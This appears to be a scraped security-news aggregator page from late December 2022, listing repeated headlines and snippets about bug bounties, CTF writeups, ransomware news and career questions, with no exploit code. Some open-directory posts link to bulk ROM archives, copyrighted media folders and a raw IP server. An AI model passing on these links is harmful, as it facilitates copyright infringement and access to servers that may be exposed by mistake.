    JetBlue disclosed a bug submitted by dracoludio: https://hackerone.com/reports/1452149
  • Open

    SecWiki News 2022-12-30 Review
    Ysomap:一款适配于各类实际复杂环境的Java反序列化利用框架 by ourren TABBY:一款针对Java语言的静态代码分析工具 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-12-30 Review
    Ysomap:一款适配于各类实际复杂环境的Java反序列化利用框架 by ourren TABBY:一款针对Java语言的静态代码分析工具 by ourren 更多最新文章,请访问SecWiki
  • Open

    Old software and other stuff
    http://vtda.org/bits/ submitted by /u/Waste-Release-6235 [link] [comments]
    Lots of NES roms
    http://www.museo8bits.es/nes/ROMS/TODAS%20-%2010783%20ROMS/ submitted by /u/Waste-Release-6235 [link] [comments]
    Enter The Megadrive / video
    Some videos, tutorials and other swag ! megadrive megadrive2 submitted by /u/Arch-Enemy [link] [comments]
  • Open

    OSINT Case Study: Validating a website if its fraud or legit
    No content preview
    Infiltration in local network with Raspberry Pi (creating tunnel)
    No content preview
    Setting up your bug bounty scripts with Python and Bash
    No content preview
    RPS — Binary Exploitation Challenge Writeup | PicoCTF 2022
    No content preview
  • Open

    OSINT Case Study: Validating a website if its fraud or legit
    No content preview
    Infiltration in local network with Raspberry Pi (creating tunnel)
    No content preview
    Setting up your bug bounty scripts with Python and Bash
    No content preview
    RPS — Binary Exploitation Challenge Writeup | PicoCTF 2022
    No content preview
  • Open

    OSINT Case Study: Validating a website if its fraud or legit
    No content preview
    Infiltration in local network with Raspberry Pi (creating tunnel)
    No content preview
    Setting up your bug bounty scripts with Python and Bash
    No content preview
    RPS — Binary Exploitation Challenge Writeup | PicoCTF 2022
    No content preview
  • Open

    在这场2022京麒网络安全大会,我看到了京东安全的新格局
    12月29日至30日,京东集团联合多家生态社区伙伴共同举办2022京麒网络安全大会,大会主题“新格局、新理念、新安全”。
    FreeBuf 周报 | 马斯克裁员75%后、推特出现全球宕机;攻击者窃取推特 4 亿数据并出售
    文章总结本周的热点资讯、安全事件、一周好文和省心工具,保证大家不错过本周的每一个重点!
    黑客可以监听用户对话!谷歌 Home 音箱出现安全问题
    Google Home 智能音箱中出现一个安全漏洞,攻击者可以利用漏洞安装后门账户,远程控制音箱。
    LockBit被破解!日本警方已帮助3家企业恢复数据
    日本警察厅已成功解密由LockBit勒索软件组织加密的文件,帮助至少 3 家公司在没有支付赎金的情况下恢复了数据。
    车载入侵检测与防御系统介绍
    本篇文章中,我们将对汽车网络安全风险的应对策略,特别是车载入侵检测与防御系统展开详细的介绍。
    马斯克疯狂裁员75%后,推特出现全球宕机
    上万名Twitter用户报告Twitter出现故障,用户无法访问该网站或使用其主要功能。
  • Open

    Don Quixote DevOps
    Running a SAST only testing environment may create a Don Quixote scenario: too many costly false positives that eat up your team’s time… Continue reading on Medium »
  • Open

    Don Quixote DevOps
    Running a SAST only testing environment may create a Don Quixote scenario: too many costly false positives that eat up your team’s time… Continue reading on Medium »

  • Open

    Lots of music videos
    ​ Lots of oldies 70's 80's etc. http://162.212.178.138:8080/gsongs/ submitted by /u/Expensive-Vanilla-16 [link] [comments]
    Classic cartoons and tv shows
    https://wm.sirens.rocks/music/Michael%20Giacchino/Full music albums from some movies http://fina.dyndns.tv/Cartoons/Classic cartoons ( and more in parent directory). https://wm.sirens.rocks/music/More music submitted by /u/Waste-Release-6235 [link] [comments]
    NES game manuals
    http://www.tendohub.com/Manuals/NES/ submitted by /u/Waste-Release-6235 [link] [comments]
    Nice selection of music
    http://www.ashleecadell.com/xyzstorelibrary/ submitted by /u/Waste-Release-6235 [link] [comments]
  • Open

    FreeBuf早报 | 推特正经历全球性中断;谷歌智能音箱存在后门
    111
    BILLU: B0X靶场实战
    BILLU: B0X是Vulnhub上的一个靶场,难度为medium。
    高危漏洞下的业务安全、公有云数据泄露的责任划分 | FB甲方群话题讨论
    如何修补不能中断的业务中的高危漏洞?公有云发生数据泄露时责任如何分担?
    地下组织如何利用被盗身份和deepfakes
    越来越多的深度造假(deepfake)攻击正在显著重塑组织、金融机构、名人、政治人物甚至普通人的威胁格局。
    云安全之OSS对象存储安全总结
    同一阿里云账号在同一地域内创建的Bucket总数不能超过100个。Bucket创建后,其名称无法修改。
    俄亥俄州法院、警察局遭到 LockBit 勒索软件攻击
    攻击者安装了名为 LockBit 的勒索软件,并要求支付赎金以获取某些文件。
    赶紧自查,Citrix数千台服务器存在严重安全风险
    数以千计的Citrix ADC 和网关部署仍然存在安全风险,即便该品牌服务器在此之前已经修复了两个严重的安全漏洞。
    27万名患者信息泄露,美国路易斯安那州医院遭勒索攻击
    美国路易斯安那州的查尔斯湖纪念医院发出通告称,该院近期发生一起网络勒索攻击事件,近27万名患者信息遭到泄露。
    BitKeep遭网络攻击,数字货币损失超900万美元
    区块链加密钱包BitKeep于12月28日证实了一次网络攻击,该攻击目的是窃取用户的数字货币。
    DirtyPipe(CVE-2022-0847)漏洞分析
    CVE-2022-0847 DirtyPipe脏管道漏洞是Linux内核中的一个漏洞,该漏洞允许写只读文件,从而导致提权。
  • Open

    Heya guys! Got a lappy for Xmas. I'm getting into pen testing, went with ParrotOS instead of Kali. Any tips or suggestions, software, etc I should know?
    Specs: OS: Parrot OS 5.1 [Security] CPU: Intel i5-8365U @ 4.100MHz RAM: 16GB DDR3 @ 3200MHz Storage: 1TB WD Blue NVMe M.2 SSD I'm not a complete linux noob, I'm a mix between entry level and somewhat adept I'd say but leaning towards the beginner side a little. I have a NAS I set up with OpenMediaVault which is dependent upon terminal so I can get around one most times. It's running a MiniDLNA server hosting all my movies, got OS's backed up on it, etc. ​ Went with ParrotOS Sec over Kali [Blackarch is far too intimidating for me, as is Arch in general.] due to this laptop also sorta serving as a secondary mobile daily driver. I have a somewhat beastly Windows gaming rig as my main D.D. This machine is primarily for pen testing and network engineering [Learning those to be exact] so any tips, resources, scripts, programs you guys know of please recommend! Starting points would be very nice. I've already toyed around with hacking WiFi networks [ethically of course.] with Airgeddon. Thanks in advance! ​ Also to add: This is my first real time using Linux desktop environments in this capacity, most previously was VM stuff. So any tips there is welcomed as well. I came from of course, long experience with Windows. submitted by /u/I_Collect_Viruses [link] [comments]
    What are some fun cyber security coding projects?
    What are some fun cyber security coding projects? submitted by /u/herbertisthefuture [link] [comments]
    Macbook pro 14
    want to break into pen testing and HTB, are there any good solid alternatives to Parallels that are free? submitted by /u/Confident_Nebula_560 [link] [comments]
    Would anyone mind reviewing my resume and letting me know your thoughts? Cause I may start looking for new opportunity next year. (Application Penetration Tester)
    https://imgur.com/a/LDmHbMQ submitted by /u/No-job-no-money [link] [comments]
    Any GRC platforms for SOC 2, NIST, CCPA, etc actually good?
    Trying to find one that works well, have looked at a number of them like OneTrust, LogicGate, StandardFusion, Vanta, etc. All leave something to be desired, wanted to see what others are using to help with SOC audits and GRC internally. submitted by /u/junkaccount1999 [link] [comments]
    Assembly beginner
    Hi, I am interested in RE, and I am following a very interesting course on TCM academy (https://academy.tcm-sec.com/p/practical-malware-analysis-triage) By the way, I think I'd need more consistent knowledge about how assembly works, how to use a debugger (eg. x32dbg) and so on. Anyone can recommend a good starting point? thank you very much! submitted by /u/g-simon [link] [comments]
    Wanting to learn advice
    Hi guys I have an old windows 10 pc and I would basically like to learn how to do things on it as a hobby. I’d like to learn how to like reinstall it, install new operating systems like Linux or whatever that are secure on it, I don’t really know actually but basically just learn how to do different things on it just for funsies and as a hobby. Right now I basically just use it to stream jazz music or sounds of nature in the background for my room lol. What can I do with this to learn fun computer things like learning how to wipe and reboot windows 10 and installing Linux what other operating systems are there? What should I do with it? Like I want to train myself to be like an IT person almost, I’d be excited to learn. **Asknetsec is there a way that I could learn to like plug in an android and learn how to see if there is malware or viruses on it and do like cybersecurity analysis? Or would that be too advanced? What resources do I have to learn these things? Right now I’m planning on just using YouTube Reddit and google. If you don’t know but know of resources I should check out I’d appreciate that as well. Thanks! submitted by /u/Normal-Question-1994 [link] [comments]
    Diamond Model activity thread analysis
    Hello, First of all, I hope this post is relevant. I'm working on a presentation about the Solarwinds incident. I want to analyze the threat actor through the diamond model (DM). I've researched the DM and understand the basics i.e. the four edges, its meta-features and the possibility to synthesize (introducing LKC as the phase) with other CTI models. Basically, I want to create an activity thread for the different "incidents" (Sunspot, Sunburst, Teardrop & Raindrop). But when I start looking into how to do this, I don't feel as if I'm understanding it. Here is an example picture of an activity thread: https://i0.wp.com/www.activeresponse.org/wp-content/uploads/2016/08/DiamondModelActivityThreads.jpg?fit=550%2C404&ssl=1 What I don't understand about the activity thread is: Does the arrow edge placement on each diamond mean something? Or is it simply to show the movement between different incidents/stages and understand the flow of the attack(s)? When and why should I introduce multiple diamond shapes into one cell of the activity thread? Why are some diamonds and arrows dotted? submitted by /u/Leosoda [link] [comments]
  • Open

    Cobalt Strike Alternative?
    what post-exploitation framework are you using? is there an open source alternative to CS? Is it true that Armitage is very similar (design and operation) to CS? submitted by /u/179Desire [link] [comments]
  • Open

    Using OSINT to Become Better at Ethical Hacking
    Ethical hacking is the use of hacking, but with an ethical approach and goal. It is a vital tool for discovering and tackling… Continue reading on Medium »
    Basic Intro to Intelligence Gathering from Open Sources OSINT
    Continue reading on Medium »
    OSINT
    OSINT & sock Puppets Continue reading on Medium »
    OSINT Case Study: Validating a website if its fraud or legit
    Hey guys, this is me Dheeraj Yadav and in this blog, we will be learning about how to validate if it's a fraud website or a legit one. Continue reading on InfoSec Write-ups »
    Update v1 (Malaysian OSINT resource list)
    This is the 1st update for Malaysian OSINT resource list Continue reading on Medium »
  • Open

    VHL 10.1x.1.95 — James
    Beginner box from Virtual Hacking Labs, scan results below. Continue reading on Medium »
    VHL 10.1x.1.4 — Backup Admin V2
    Intro Here Continue reading on Medium »
    Terms in MITRE ATT&CK
    As I learned the mitre framework, I struggled greatly with mitre terms. Terms like tactics, techniques, sub techniques and procedures… Continue reading on Medium »
    ACTIVE DIRECTORY 101 — SETTING YOUR LAB
    We started simple with what Active Directory(AD) is all about. Now it’s time to go on to build one and grasp the practical knowledge… Continue reading on Medium »
  • Open

    Google releases open-source vulnerability scanning tool
    Article URL: https://www.infoq.com/news/2022/12/google-osv-scanner/ Comments URL: https://news.ycombinator.com/item?id=34175558 Points: 17 # Comments: 1
    Please help me handle a security vulnerability
    In 2018 I discovered a security vulnerability and worked with both government and business to try to correct the issue. After 6 months of phone calls and emails, I opted to accept their proposed fixes and left the entire thing in the hands of the Government of Canada. My feedback was ignored entirely. I wasted ~100 hours and for that I got precisely nothing. On December 21, 2022 I required use of the service in question and once again found a security problem. The same problem. On December 21, 2022 I noted several pieces of evidence which indicate active exploitation of the vulnerability. On December 21, 2022 I contacted: CBC, The business, NDP, and the OPC. To date, none of them have contacted me except for automated responses. I get that it's Christmas but over a week just to hear anything from any human from any of those organizations? Nothing. At the most severe, the security vulnerability threatens life and limb. It impacts approximately 2,000,000 people directly and I would estimate the total impact in the 10s or 100s of millions of people. It impacts people globally. It's causing me too much stress. If you are in a verifiable position of power in Canada, please indicate how I can get in touch with you. Otherwise, please, any advice you have on how I can get rid of this curse without harming anyone is greatly appreciated. Comments URL: https://news.ycombinator.com/item?id=34174110 Points: 16 # Comments: 8
  • Open

    𓅃 Announcing Matano + Crowdstrike: Open source project to analyze security logs on S3 using SQL & build realtime detections-as-code
    submitted by /u/shaeqahmed [link] [comments]
    Writing Windows Kernel Drivers for Advanced Persistence (Part 1)
    submitted by /u/v3ded [link] [comments]
    New CatB Ransomware Employs 2-Year Old DLL Hijacking Technique To Evade Detection
    submitted by /u/woja111 [link] [comments]
    dnstwist: send potential spear phishing domains to Slack
    submitted by /u/nindustries [link] [comments]
    Turning Google smart speakers into wiretaps for $100k
    submitted by /u/Gallus [link] [comments]
  • Open

    SecWiki News 2022-12-29 Review
    针对军工和教育行业的CNC组织“摆渡”木马分析 by ourren 2022年网络安全四大顶会论文录用列表(中国大陆) by ourren [HTB] Jarvis Writeup by 0x584a 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-12-29 Review
    针对军工和教育行业的CNC组织“摆渡”木马分析 by ourren 2022年网络安全四大顶会论文录用列表(中国大陆) by ourren [HTB] Jarvis Writeup by 0x584a 更多最新文章,请访问SecWiki
  • Open

    Account Takeover Due to Cognito Misconfiguration Earns Me $xxxx
    Hello Guys, I haven’t written anything in a long time. Continue reading on Medium »
    How I got a Bug At Apple that lead’s to takeover accounts of any user who view my profile
    Hi Team Iam Abdelkader Mouaz my pseudo is Hamzadzworm today i will share with you a Bug That Lead To Takeover account of any user just if… Continue reading on Medium »
    Encontrei 2 XSS no site de um Banco.
    Olá, como vocês estão, espero que estejam bem. Continue reading on Medium »
    how to have an effective recon?
    📑 Introduction Continue reading on Medium »
    !00 Complex terms related to Bug Bounty Explained for a Newbie
    Vulnerability: A weakness or flaw in a computer system or application that can be exploited by an attacker to gain unauthorized access or… Continue reading on Medium »
    Threat Hunting Methodology
    Photo by Tima Miroshnichenko from Pexels Continue reading on Medium »
    Bug Bounty Hunters V/S Nation Sponsored Hackers
    Bug bounty hunters, also known as ethical hackers, are individuals or organizations that specialize in finding and reporting… Continue reading on Medium »
    Difficulty of Reproducing Old Exploits
    I tried to follow the Immunefi article to reproduce the Fei protocol exploit, published June 2021, but it is now December 2022. Continue reading on Medium »
    How I Design My Prefect Bug Bounty Automation (1)
    This is a series of articles about how I design and Implemented my prefect Bug Bounty automation. It helps me a lot, so I decide to share… Continue reading on Medium »
  • Open

    Chained open redirects and use of Ideographic Full Stop defeat Twitter's approach to blocking links
    Twitter disclosed a bug submitted by jub0bs: https://hackerone.com/reports/1032610 - Bounty: $560
    S3 bucket takeover [learn2.khanacademy.org]
    Khan Academy disclosed a bug submitted by fdeleite: https://hackerone.com/reports/1777077
  • Open

    To OOB, or Not to OOB?: Why Out-of-Band Communications are Essential for Incident Response
    tl;dr Communications are critical during an incident. If you cannot coordinate, collaborate, and inform actions and information about an incident, the incident response will eventually fail. Normally, this isn’t an issue, as organizations have resources like Microsoft 365 email, SharePoint, Slack, and Teams to use to communicate with each other. However, what happens when those... The post To OOB, or Not to OOB?: Why Out-of-Band Communications are Essential for Incident Response appeared first on TrustedSec.
  • Open

    Compromising a vulnerable GCP, INE-Labs GCPGoat walkthrough. Part-2
    No content preview
    Flutter Programming and Security Vulnerabilities
    No content preview
    JNDI Injection Series: RMI Vector — Dynamic Class Loading From Remote URL
    No content preview
    $350 XSS in 15 minutes
    Bug Bounty Writeup about DOM XSS via JSONP + Parameter pollution Continue reading on InfoSec Write-ups »
    basic file exploit(100 points)— Binary Exploitation writeup | Pico CTF 2022
    No content preview
    How Capabilities actually Work ? | Exploitation | Privilege Escalation
    No content preview
    Exploiting XSS with Javascript/JPEG Polyglot
    No content preview
  • Open

    Compromising a vulnerable GCP, INE-Labs GCPGoat walkthrough. Part-2
    No content preview
    Flutter Programming and Security Vulnerabilities
    No content preview
    JNDI Injection Series: RMI Vector — Dynamic Class Loading From Remote URL
    No content preview
    $350 XSS in 15 minutes
    Bug Bounty Writeup about DOM XSS via JSONP + Parameter pollution Continue reading on InfoSec Write-ups »
    basic file exploit(100 points)— Binary Exploitation writeup | Pico CTF 2022
    No content preview
    How Capabilities actually Work ? | Exploitation | Privilege Escalation
    No content preview
    Exploiting XSS with Javascript/JPEG Polyglot
    No content preview
  • Open

    Compromising a vulnerable GCP, INE-Labs GCPGoat walkthrough. Part-2
    No content preview
    Flutter Programming and Security Vulnerabilities
    No content preview
    JNDI Injection Series: RMI Vector — Dynamic Class Loading From Remote URL
    No content preview
    $350 XSS in 15 minutes
    Bug Bounty Writeup about DOM XSS via JSONP + Parameter pollution Continue reading on InfoSec Write-ups »
    basic file exploit(100 points)— Binary Exploitation writeup | Pico CTF 2022
    No content preview
    How Capabilities actually Work ? | Exploitation | Privilege Escalation
    No content preview
    Exploiting XSS with Javascript/JPEG Polyglot
    No content preview
  • Open

    Google OSS Fuzzes
    Do like Google and use fuzzing to find and fix bugs at scale. Continue reading on Medium »
  • Open

    Google OSS Fuzzes
    Do like Google and use fuzzing to find and fix bugs at scale. Continue reading on Medium »

  • Open

    Are refurbished routers safe?
    I bought a router on Amazon, and i didnt realize it was used/refurbished until it arrived in a random cardboard box, rather than official packaging. Is it possible for the router to be compromised in some way, and if so, are there any tools to scan for this? submitted by /u/Edward_Fingerhands [link] [comments]
    Product Security Engineer Career Path
    Hey folks, I have been working as a Product Security Engineer at a big tech company for about 2 years now and have learned the ropes of the job. I was wondering what is the progression for a product security engineer in terms of long term. Right now, all it feels like now is to keep up-to-date with latest things happening in security and doing the same thing every release of the product like code reviews, threat modeling, some dev work if needed, etc. Is AppSec or offensive security a good next step? Thinking of pursuing a certification like OSCP to better my chances of going in that direction. Thoughts? submitted by /u/thekoolhatkar [link] [comments]
    Would anyone mind reviewing my resume and letting me know your thoughts? Cause I may start looking for new opportunity next year.
    https://imgur.com/a/LDmHbMQ submitted by /u/No-job-no-money [link] [comments]
    Graduate Certificate or MS Degree?
    I’ve been thinking a lot about getting a Master’s in Cybersecurity but the cost is making me hesitant. I don’t really need it but always had it as a goal. I got my BS from WGU and am going back and forth on the following- Getting a Graduate Certificate from a well known university or get a full MS degree from WGU or a smaller state university. Curious if anyone has a graduate cert and how it went vs. getting a full degree. I know it’s much cheaper and you only take about 4 courses total. submitted by /u/snokerpoker [link] [comments]
  • Open

    BufferPwn: RCE vulnerability in the common network code of several first party Nintendo games since the Nintendo 3DS
    [link] [comments]
    G-3PO: A Protocol Droid for Ghidra (a Ghidra script that glosses decompiled functions with GPT-3 generated comments)
    submitted by /u/0xdeba5e12 [link] [comments]
    Attack Surface Reduction BOF
    submitted by /u/IamaCerealKilla [link] [comments]
    Video game save file Trojan personified
    submitted by /u/bemodtwz [link] [comments]
    Certificate Ripper v2 released - tool to extract server certificates
    submitted by /u/Hakky54 [link] [comments]
  • Open

    Pontem Announces Immuefi Bug Bounty For Liquidswap DEX
    Pontem is excited to announce a new bug bounty program for our Liquidswap DEX/AMM, administered via Immunefi. Continue reading on Pontem Network »
    Hacking Basics
    Zero to Hero Hacking Series Continue reading on Medium »
    Feedback Analyzer Exploitation
    Hi, I have recently come accross an interesting dashboard of one of the top 10 company in the world. The dashboard was a feedback… Continue reading on Medium »
    Out Of Band Command Injection
    Command Injection or OS Command Injection is a kind of injection vulnerabilities, where an attacker is able to exploit an unsanitized user… Continue reading on Medium »
    Unauthorized Sign-up on Subdomain of Subdomain leading to Organization takeover worth $2000
    Hello people, Here I am sharing another four digit write-up which is one of my very old finding. If you haven’t read my previous writeup… Continue reading on InfoSec Write-ups »
    How I Earned My First Bug Bounty Reward of $1000
    In this article, I want to discuss about my journey of making $1000 dollars from Bug Bounty program and the lessons I learned through this… Continue reading on InfoSec Write-ups »
    Review of the Hashcat Password Cracker
    A necessary tool for password strength checks and penetration testers. Continue reading on Bug Zero »
    How Can You Take Advantage Of The Long-Term Investment Opportunity In Cybersecurity?
    The cybersecurity industry is quickly expanding and creating new methods to defend against sophisticated threats. Continue reading on Bug Zero »
    LDAP anonymous login story of my 3 simple P3 findings in DHS
    Assalamu Alaikum peace be upon you Continue reading on Medium »
    The Joy of Building a Community through Patreon: My Journey with Cyberlix
    As a cybersecurity professional, I have always been interested in finding ways to improve the security of organizations and individuals… Continue reading on Medium »
  • Open

    Nunchucks HackTheBox Walkthrough
    Summary Nunchucks is a Linux machine and is considered an easy box by the hack the box. On this box, we will begin with a
    Nunchucks HackTheBox Walkthrough
    Summary Nunchucks is a Linux machine and is considered an easy box by the hack the box. On this box, we will begin with a
  • Open

    How to install and use MOSINT v2.2 (2023) the latest working version || Email OSINT tool || +APIs
    If you are having trouble running MOSINT or installing APIs this should really help. Continue reading on System Weakness »
    How to install and use MOSINT v2.2 (2023) the latest working version || Email OSINT tool || +APIs
    If you are having trouble running MOSINT or installing APIs this should really help. Continue reading on Medium »
    OSINT CTF 2022
    Hello Everyone!!! Continue reading on Medium »
    Challenge 5 étages
    Correction du challenge proposé le 20/12/2022 sur le discord OSINT FR ainsi que sur Twitter. Continue reading on Medium »
  • Open

    SecWiki News 2022-12-28 Review
    Yi: 项目监控工具 以及 Codeql 自动运行 by ourren 异质信息网络在软件工程方向的应用调研 by ourren 2022攻防演练木马专项分析报告 by ourren 从开源项目和库的Issue和Bug报告中挖掘情报 by ourren 欧盟网络安全局 2022 年度威胁报告 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-12-28 Review
    Yi: 项目监控工具 以及 Codeql 自动运行 by ourren 异质信息网络在软件工程方向的应用调研 by ourren 2022攻防演练木马专项分析报告 by ourren 从开源项目和库的Issue和Bug报告中挖掘情报 by ourren 欧盟网络安全局 2022 年度威胁报告 by Avenger 更多最新文章,请访问SecWiki
  • Open

    PwnTillDawn: Vega
    Vega was an easy box residing at IP address 10.150.150.222. As usual we will start off with a rustscan: Continue reading on Medium »
    PoC Vulnerabilidade na Aplicação HFS (HTTP File Server) 2.3.x
    Introdução Continue reading on Medium »
  • Open

    Wordpress users Disclosure [ /wp-json/wp/v2/users/ ] Not Resolved ()
    MTN Group disclosed a bug submitted by thewikiii: https://hackerone.com/reports/1784999
  • Open

    Unauthorized Sign-up on Subdomain of Subdomain leading to Organization takeover worth $2000
    No content preview
    How I Earned My First Bug Bounty Reward of $1000
    No content preview
    The Big Danger With Laravel ( .env file )
    No content preview
    Wireshark twoo — Forensics| PicoCTF Write-up | 100 Points
    No content preview
    Compromising a vulnerable GCP, INE-Labs GCPGoat walkthrough. Part-1
    No content preview
  • Open

    Unauthorized Sign-up on Subdomain of Subdomain leading to Organization takeover worth $2000
    No content preview
    How I Earned My First Bug Bounty Reward of $1000
    No content preview
    The Big Danger With Laravel ( .env file )
    No content preview
    Wireshark twoo — Forensics| PicoCTF Write-up | 100 Points
    No content preview
    Compromising a vulnerable GCP, INE-Labs GCPGoat walkthrough. Part-1
    No content preview
  • Open

    Unauthorized Sign-up on Subdomain of Subdomain leading to Organization takeover worth $2000
    No content preview
    How I Earned My First Bug Bounty Reward of $1000
    No content preview
    The Big Danger With Laravel ( .env file )
    No content preview
    Wireshark twoo — Forensics| PicoCTF Write-up | 100 Points
    No content preview
    Compromising a vulnerable GCP, INE-Labs GCPGoat walkthrough. Part-1
    No content preview
  • Open

    Knex.js SQL injection vulnerability, unpatched for 6 years
    Article URL: https://github.com/knex/knex/issues/1227 Comments URL: https://news.ycombinator.com/item?id=34160038 Points: 3 # Comments: 0
  • Open

    FreeBuf早报 | 欧盟网络安全局2022年度威胁报告;美国司法部正在调查 FTX 黑客攻击
    数字资产衍生品交易所FTX 于 11 月申请破产后数小时内,未知黑客从 FTX 中窃取了 3.72 亿美元。
    商用密码应用安全建设知识技能研究与思考
    文章从密评政策标准研读、密评技术知识学习、密评建设项目实践三个方面阐述了密码安全技术知识。
    加密货币矿池 BTC.com 数字资产被盗,损失 300 万美金
    被盗资产中属于 BTC.com 客户的资产约70万美元,属于公司的资产价值约230万美元。
    剑桥分析丑闻最新进展,Mate花7.25亿美元进行和解
    Meta Platform 已同意支付 7.25 亿美元来解决 2018 年提起的长期集体诉讼。
  • Open

    System Administrator to Digital Forensics
    I got out the military a few months ago and did IT but barely did my job. I just wasn't lucky to be placed in units where I get a lot of hands on. I don't have much computer skills except desktop support. Anyway, I'm trying to get out this field of IT and considered getting a Masters in Digital Forensics. My only concern is, do I need to know programming for digital forensics? I have a Top Secret Clearance and wonder if that will help get a job in that field with no experience. I've been sorting out many options. I'd like to clarify that I have a Bachelors in Digital Media and Web Technology. The main track I took within that degree was Digital Media. Also, I'd like to add that I'm currently a system admin, but I really do general help desk work. That's just the title I have lol. I wanted a job where I can make a great impact. I tried to apply for Special Agent Federal jobs (1811) but #1, I get rejected because no background, #2, I never hear anything back. So now that I found my interest, I was wondering if this is a good field to get into. I sound all over the place submitted by /u/confusedwithlife20 [link] [comments]
  • Open

    Did the great state of Texas leave their DOT website wide open?
    Not sure what all is in this OD but noticed mostly PDF's and some wmv's here and there. Not sure if intended or accidental but lots to explore. Texas DOT submitted by /u/BustaKode [link] [comments]

  • Open

    New AMSI Bypass Using CLR Hooking
    submitted by /u/pracsec [link] [comments]
    Spice up your persistence: loading PHP extensions from memory
    submitted by /u/gid0rah [link] [comments]
    Scaling Continuous Security Testing on the Cheap
    submitted by /u/DH_Prelude [link] [comments]
    Netcomm NF20MESH Cloud Mesh router - Unauthenticated Remote Code Execution
    submitted by /u/Gallus [link] [comments]
  • Open

    New AMSI Bypass Using CLR Hooking
    submitted by /u/pracsec [link] [comments]
  • Open

    Should I be setting up 2FA for any program I use? Or only super important stuff?
    Hey all! I’ve known about 2FA, but I thought I’ve heard someone say it’s not safe? And some people don’t recommend it - But from most things online people say you might aswell set it up. What’s your thoughts? I mainly have games / programs that suggest it being set up. Stream & Epic and some other game programs. Thanks! EDIT: after reading into this sub, I see a lot more of what 2FA means - I just mean hooking my phone up to accounts so it also sends a text to my phone with a code. EDIT 2: I should mention - I had my accounts comprised after I was sim swapped. So I’ve been trying to make sure everything’s more secure (use to only use 2 passwords) have everything changed to longer / unique single use passwords. Wondering how I can beef up my security! I for some reason paranoid and don’t like the idea of password managers but I’m sure it’s a good option. submitted by /u/ShallowBox [link] [comments]
    How can you scan single-page web apps? Burp isn't built for it, so are there any other tools that would work?
    Typically, I'll use Burp Suite to scan and test web apps, however a client is utilizing a single-page architecture and Burp just doesn't handle it very well. Is there a tool that can scan and provide testing capabilities for single-page web apps? Thanks and any insight is greatly appreciated!!! submitted by /u/Let_us_Hope [link] [comments]
    Backing up iCloud recovery key on Google Drive
    I recently turned on the Advanced Data Protection for iCloud, which means that if I lose my recovery key, all of my data is lost. In addition to a physical print-out, I have also uploaded an encrypted pdf of the recovery key to Google Drive. Is this a bad idea for some reason? Am I missing a possible security vulnerability? submitted by /u/DogsBucolic [link] [comments]
    Why does Google not enable signing in to your account via scanning qr code or code sent to your email on the phone? Like Steam, OneDrive or Discord do.
    And any session that is only logged via qr code/email code to not be able to see the backup codes or change the passwords, see google passwords in the manager, or log out superior sessions(that that do have the password inputed or an extra 2fa layer) etc. submitted by /u/dan1991Ro [link] [comments]
    How do you conduct client vetting for pentesting?
    When taking on new clients what vetting process do you go through to protect yourself as a tester? submitted by /u/Waddup_yall [link] [comments]
    Is there any sample for testing credentials/coding leakage from threat intelligence solution?
    Hello, We have been using the threat intelligence solution and currently want to test its effectiveness. Do you have any sample on GitHub so that I can check whether the said solution can detect or not? The code should include corporate credentials (username/passwords). submitted by /u/sanba06c [link] [comments]
  • Open

    Harma — неизвестная планета или существо на планете Х.
    Учёные доказали, что в солнечной системе находятся 9 больших планет, но они ошибались… Не так давно, я познакомился с увлекательной книгой… Continue reading on Medium »
  • Open

    Experian Vulnerability Shows Any Report with just SSN, DOB, ADR
    Article URL: https://infosec.exchange/@briankrebs/109587022002246891 Comments URL: https://news.ycombinator.com/item?id=34152981 Points: 125 # Comments: 22
  • Open

    从红队视角看AWD攻击
    AWD的权限维持攻防兼备AWD模式是一种综合考核参赛团队攻击、防御技术能力、即时策略的比赛模式。
    FreeBuf早报 | 全球反勒索工作将于明年1月启动;微软违反隐私政策被罚六千万
    澳大利亚网络安全部长Clare O 'Neil计划在未来几天宣布,一个打击勒索软件的全球特别工作组将于下个月开始运作。
    如何使用NetLlix通过不同的网络协议模拟和测试数据过滤
    NetLlix是一款功能强大的数据过滤工具,广大研究人员可以通过不同的网络协议来模拟和测试数据过滤。
    记一次灰盒代码审计之旅
    我们可以利用黑盒来快速寻找source点(外部传入参数),利用白盒来寻找sink点(风险函数),从而快速定位漏洞点。
    展望:2023 年值得关注的网络安全趋势
    本文是一些专家对未来一年网络安全领域的展望。
    2022 全球网络黑产常用攻击方法 Top 10
    本文列举当下最流行的网络黑产常用攻击方法,总结了2022全球网络黑产常用攻击方法Top 10,带你更深刻认识网络黑产。
    FB赠书第 92 期 | 《域渗透攻防指南》在手! 助你成为 AD 域专家
    如果域控沦陷,则 AD 域环境中的所有机器都将被控制,这是一件多么可怕的事啊!因此,AD域安全至关重要。
    Linux 被爆“满分级”关键内核级漏洞
    该漏洞的 CVSS 评分达到了最高级别的10分,影响启用了 KSMBD 的服务器。
  • Open

    Florida Snow Writeup
    PROLOGUE Continue reading on The Sleuth Sheet »
    How to do OSINT with urban tree data
    Using QGIS, Overpass, Python & open tree data to locate places in images Continue reading on Medium »
    A little Python can go a long, long way (in OSINT)
    Knowing how to program (even a little) can give you a serious advantage in the OSINT game. Continue reading on Medium »
    A Christmas Conspiracy write-up
    a christmas conspiracy is my first write-up of hacktoria collaborations. well Hacktoria provides Story Driven Capture the Flag Challenges… Continue reading on Medium »
  • Open

    Leak of sensitive values to Airflow rendered template
    Internet Bug Bounty disclosed a bug submitted by jrs53: https://hackerone.com/reports/1773895 - Bounty: $480
    SMTP Command Injection in Appointment Emails via Newlines
    Nextcloud disclosed a bug submitted by spaceraccoon: https://hackerone.com/reports/1509216 - Bounty: $250
  • Open

    Learning Tsurugi - Make volume readable?
    I just finished my AAS in CyberSecurity and I'm diving more into forensics. The classes I took on the subject used Deft in labs which I know is more or less defunct now and by the guidance of this sub I'm now repeating some of those exercises in Tsurugi. My Linux skills are probably a 4/10, so I apologize if this is a dumb question. In one lab I need to copy data off of a drive being analyzed to a "USB drive." I'm using HyperV, and have both devices attached as a VHD file. However, I can't seem to unlock the USB drive using sudo mount -o remount,rw '/media/tsurugi/ ' as this results in the error "cannot remount dev/sda1 read-write, is write-protected." Most of what I am finding is related to defective hardware, but this is a virtual drive. I suspect there is a configuration somewhere that I'm missing, but damned if I can find it. (I'm using HyperV, which I know is less than ideal because I have it installed already for several reasons that aren't relevant to this conversation. As such, I can't run another hypervisor. If this is a HyperV problem, I will have to table this goal for another time) Edit: As a workaround, I was able to mount a network share with CIFS. 